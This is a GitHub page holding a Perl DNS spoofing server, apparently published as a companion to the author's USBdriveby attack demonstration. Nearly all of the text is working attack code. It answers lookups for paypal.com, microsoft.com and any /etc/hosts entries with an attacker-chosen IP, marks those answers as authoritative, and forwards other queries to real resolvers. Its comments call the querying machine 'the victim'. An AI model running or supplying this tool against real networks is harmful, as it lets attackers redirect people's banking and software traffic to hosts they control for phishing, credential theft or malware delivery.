-
Notifications
You must be signed in to change notification settings - Fork 285
/
Copy pathdns_spoofer.pl
executable file
·108 lines (89 loc) · 2.14 KB
/
dns_spoofer.pl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
#!/usr/bin/perl
#
# recursive DNS server which spoofs specific hosts
# created as an example for USBdriveby
# http://samy.pl/usbdriveby
#
# you can spoof hosts by adding them to your /etc/hosts
# or by adding them to the array below
#
# -samy kamkar, dec 16
# to install Net::DNS, run:
# perl -MCPAN -e 'install Net::DNS'
use strict;
use Net::DNS::Nameserver;
# ip to bind dns server to
my $BINDIP = "127.0.0.1";
# port to bind dns server to (< 1024 requires root)
my $BINDPORT = 53;
# hosts to spoof, or add them to /etc/hosts
my %spoof = (
'paypal.com' => '72.14.179.47',
'microsoft.com' => '72.14.179.47',
);
# real nameservers to resolve hosts through
my @ns = qw/4.2.2.2 4.2.2.3/;
# hosts file path
my $hostsfile = "/etc/hosts";
# read in /etc/hosts for more spoofed domains
open(HOSTS, "<$hostsfile") || die "Can't read $hostsfile: $!";
while (<HOSTS>)
{
if (/^\s*(\d+\.\d+\.\d+\.\d+)\s+([^#\s]+)/)
{
$spoof{lc($2)} = $1;
}
}
close(HOSTS);
my $resolver = new Net::DNS::Resolver(
nameservers => \@ns,
recurse => 1,
);
sub uniq
{
my %seen;
grep !$seen{$_}++, @_;
}
sub reply_handler
{
my ($qname, $qclass, $qtype, $peerhost,$query,$conn) = @_;
my ($rcode, @ans, @auth, @add);
my $err = "NOERROR";
print "Received query from $peerhost to ". $conn->{sockhost}. "\n";
$query->print;
# if the victim is attempting to lookup a domain we're spoofing
if ($spoof{lc($qname)})
{
# spoof a response!
my ($ttl, $rdata) = (3600, $spoof{lc($qname)});
my $rr = new Net::DNS::RR("$qname $ttl $qclass $qtype $rdata");
push @ans, $rr;
}
# look up a real host and respond appropriately
else
{
my $ret = $resolver->search($qname);
if ($ret)
{
foreach my $rr ($ret->answer)
{
next unless $rr->type eq "A";
push @ans, @{$ret->{answer}};
}
}
else
{
$err = "NXDOMAIN";
}
}
# mark the answer as authoritive by setting the 'aa' flag
@ans = uniq(@ans);
return ($err, \@ans, \@auth, \@add, { aa => 1 });
}
my $ns = new Net::DNS::Nameserver(
LocalPort => $BINDPORT,
LocalAddr => $BINDIP,
ReplyHandler => \&reply_handler,
Verbose => 1
) || die "couldn't create nameserver object\n";
$ns->main_loop;